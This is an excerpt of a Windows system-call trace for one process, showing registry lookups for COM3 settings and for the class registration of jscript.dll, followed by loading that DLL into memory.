 01763   456   NtNotifyChangeKey  (164, 168, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01764   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 172, ) }, ... 172, ) == 0x0
 01765   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 176, ) == 0x0
 01766   456   NtNotifyChangeKey  (172, 176, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01767   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 180, ) == 0x0
 01768   456   NtNotifyChangeKey  (124, 180, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01769   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 184, ) }, ... 184, ) == 0x0
 01770   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 188, ) == 0x0
 01771   456   NtNotifyChangeKey  (184, 188, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01772   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 192, ) }, ... 192, ) == 0x0
 01773   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 196, ) == 0x0
 01774   456   NtNotifyChangeKey  (192, 196, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01775   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Classes\CLSID"}, ... 200, ) }, ... 200, ) == 0x0
 01776   456   NtCreateEvent  (0x1f0003, 0x0, 0, 0, ... 204, ) == 0x0
 01777   456   NtNotifyChangeKey  (200, 204, 0, 0, 2011390432, 5, 1, 0, 0, 1, ... ) == 0x103
 01778   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01779   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 208, ) }, ... 208, ) == 0x0
 01780   456   NtQueryValueKey  (208,  (208, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (208, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 01781   456   NtClose  (208, ... ) == 0x0
 01782   456   NtAllocateVirtualMemory  (-1, 8798208, 0, 4096, 4096, 4, ... 8798208, 4096, ) == 0x0
 01783   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01784   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 01785   456   NtOpenSection  (0x4, {24, 64, 0x0, 0, 0,  (0x4, {24, 64, 0x0, 0, 0, "__R_000000000007_SMem__"}, ... 208, ) }, ... 208, ) == 0x0
 01786   456   NtMapViewOfSection  (208, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0x9b0000), {0, 0}, 24576, ) == 0x0
 01787   456   NtAllocateVirtualMemory  (-1, 8802304, 0, 8192, 4096, 4, ... 8802304, 8192, ) == 0x0
 01788   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01789   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 212, ) }, ... 212, ) == 0x0
 01790   456   NtQueryValueKey  (212,  (212, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (212, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 01791   456   NtClose  (212, ... ) == 0x0
 01792   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01793   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 01794   456   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 1, ... 10223616, 65536, ) == 0x0
 01795   456   NtAllocateVirtualMemory  (-1, 10223616, 0, 4096, 4096, 4, ... 10223616, 4096, ) == 0x0
 01796   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES"}, 138, ) }, 138, ) == 0x0
 01797   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01798   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... 212, ) }, ... 212, ) == 0x0
 01799   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}F"}, 162, ) }, 162, ) == 0x0
 01800   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01801   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01802   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01803   456   NtClose  (216, ... ) == 0x0
 01804   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01805   456   NtOpenKey  (0x1, {24, 214, 0x40, 0, 0,  (0x1, {24, 214, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01806   456   NtClose  (214, ... ) == 0x0
 01807   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 01808   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01809   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... 212, ) }, ... 212, ) == 0x0
 01810   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}F"}, 162, ) }, 162, ) == 0x0
 01811   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01812   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01813   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01814   456   NtClose  (216, ... ) == 0x0
 01815   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01816   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "InprocServer32"}, ... 216, ) }, ... 216, ) == 0x0
 01817   456   NtAllocateVirtualMemory  (-1, 1380352, 0, 4096, 4096, 4, ... 1380352, 4096, ) == 0x0
 01818   456   NtQueryKey  (218, Name, 392, ... {Name= (218, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, 192, ) }, 192, ) == 0x0
 01819   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01820   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 220, ) == 0x0
 01821   456   NtQueryInformationToken  (220, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01822   456   NtClose  (220, ... ) == 0x0
 01823   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01824   456   NtQueryValueKey  (218,  (218, "InprocServer32", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01825   456   NtClose  (218, ... ) == 0x0
 01826   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}_"}, 162, ) }, 162, ) == 0x0
 01827   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01828   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01829   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01830   456   NtClose  (216, ... ) == 0x0
 01831   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01832   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "InprocServerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01833   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}_"}, 162, ) }, 162, ) == 0x0
 01834   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01835   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01836   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01837   456   NtClose  (216, ... ) == 0x0
 01838   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01839   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01840   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}_"}, 162, ) }, 162, ) == 0x0
 01841   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01842   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01843   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01844   456   NtClose  (216, ... ) == 0x0
 01845   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01846   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "InprocServer32"}, ... 216, ) }, ... 216, ) == 0x0
 01847   456   NtQueryKey  (218, Name, 392, ... {Name= (218, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, 192, ) }, 192, ) == 0x0
 01848   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01849   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 220, ) == 0x0
 01850   456   NtQueryInformationToken  (220, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01851   456   NtClose  (220, ... ) == 0x0
 01852   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01853   456   NtQueryValueKey  (218, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data= (218, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0W\0I\0N\0D\0O\0W\0S\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0j\0s\0c\0r\0i\0p\0t\0.\0d\0l\0l\0\0\0"}, 76, ) }, 76, ) == 0x0
 01854   456   NtClose  (218, ... ) == 0x0
 01855   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}_"}, 162, ) }, 162, ) == 0x0
 01856   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01857   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01858   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01859   456   NtClose  (216, ... ) == 0x0
 01860   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01861   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01862   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}_"}, 162, ) }, 162, ) == 0x0
 01863   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01864   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01865   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01866   456   NtClose  (216, ... ) == 0x0
 01867   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01868   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01869   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}_"}, 162, ) }, 162, ) == 0x0
 01870   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01871   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01872   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01873   456   NtClose  (216, ... ) == 0x0
 01874   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01875   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01876   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}_"}, 162, ) }, 162, ) == 0x0
 01877   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01878   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01879   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01880   456   NtClose  (216, ... ) == 0x0
 01881   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01882   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01883   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 01884   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01885   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... 216, ) }, ... 216, ) == 0x0
 01886   456   NtQueryKey  (218, Name, 392, ... {Name= (218, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}F"}, 162, ) }, 162, ) == 0x0
 01887   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01888   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 220, ) == 0x0
 01889   456   NtQueryInformationToken  (220, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01890   456   NtClose  (220, ... ) == 0x0
 01891   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01892   456   NtQueryValueKey  (218,  (218, "AppID", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01893   456   NtClose  (218, ... ) == 0x0
 01894   456   NtClose  (214, ... ) == 0x0
 01895   456   NtOpenProcess  (0x400, {24, 0, 0x0, 0, 0, 0x0}, {452, 0}, ... 212, ) == 0x0
 01896   456   NtQueryInformationProcess  (212, Session, 4, ... {SessionId=0,}, 0x0, ) == 0x0
 01897   456   NtClose  (212, ... ) == 0x0
 01898   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 01899   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01900   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... 212, ) }, ... 212, ) == 0x0
 01901   456   NtClose  (214, ... ) == 0x0
 01902   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES2"}, 138, ) }, 138, ) == 0x0
 01903   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01904   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... 212, ) }, ... 212, ) == 0x0
 01905   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}F"}, 162, ) }, 162, ) == 0x0
 01906   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01907   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01908   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01909   456   NtClose  (216, ... ) == 0x0
 01910   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01911   456   NtOpenKey  (0x2000000, {24, 214, 0x40, 0, 0,  (0x2000000, {24, 214, 0x40, 0, 0, "InprocServer32"}, ... 216, ) }, ... 216, ) == 0x0
 01912   456   NtQueryKey  (218, Name, 392, ... {Name= (218, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, 192, ) }, 192, ) == 0x0
 01913   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01914   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 220, ) == 0x0
 01915   456   NtQueryInformationToken  (220, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01916   456   NtClose  (220, ... ) == 0x0
 01917   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01918   456   NtQueryValueKey  (218,  (218, "ThreadingModel", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0o\0t\0h\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (218, "ThreadingModel", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0o\0t\0h\0\0\0"}, 22, ) }, 22, ) == 0x0
 01919   456   NtClose  (218, ... ) == 0x0
 01920   456   NtClose  (214, ... ) == 0x0
 01921   456   NtAllocateVirtualMemory  (-1, 1384448, 0, 8192, 4096, 4, ... 1384448, 8192, ) == 0x0
 01922   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 01923   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01924   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}"}, ... 212, ) }, ... 212, ) == 0x0
 01925   456   NtQueryKey  (214, Name, 384, ... {Name= (214, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}F"}, 162, ) }, 162, ) == 0x0
 01926   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01927   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 216, ) == 0x0
 01928   456   NtQueryInformationToken  (216, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01929   456   NtClose  (216, ... ) == 0x0
 01930   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01931   456   NtOpenKey  (0x1, {24, 214, 0x40, 0, 0,  (0x1, {24, 214, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01932   456   NtClose  (214, ... ) == 0x0
 01933   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\jscript.dll"}, 1237544, ... ) }, 1237544, ... ) == 0x0
 01934   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\jscript.dll"}, 5, 96, ... 212, {status=0x0, info=1}, ) }, 5, 96, ... 212, {status=0x0, info=1}, ) == 0x0
 01935   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 212, ... 216, ) == 0x0
 01936   456   NtClose  (212, ... ) == 0x0
 01937   456   NtMapViewOfSection  (216, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x9d0000), 0x0, 598016, ) == 0x0
 01938   456   NtClose  (216, ... ) == 0x0
 01939   456   NtUnmapViewOfSection  (-1, 0x9d0000, ... ) == 0x0
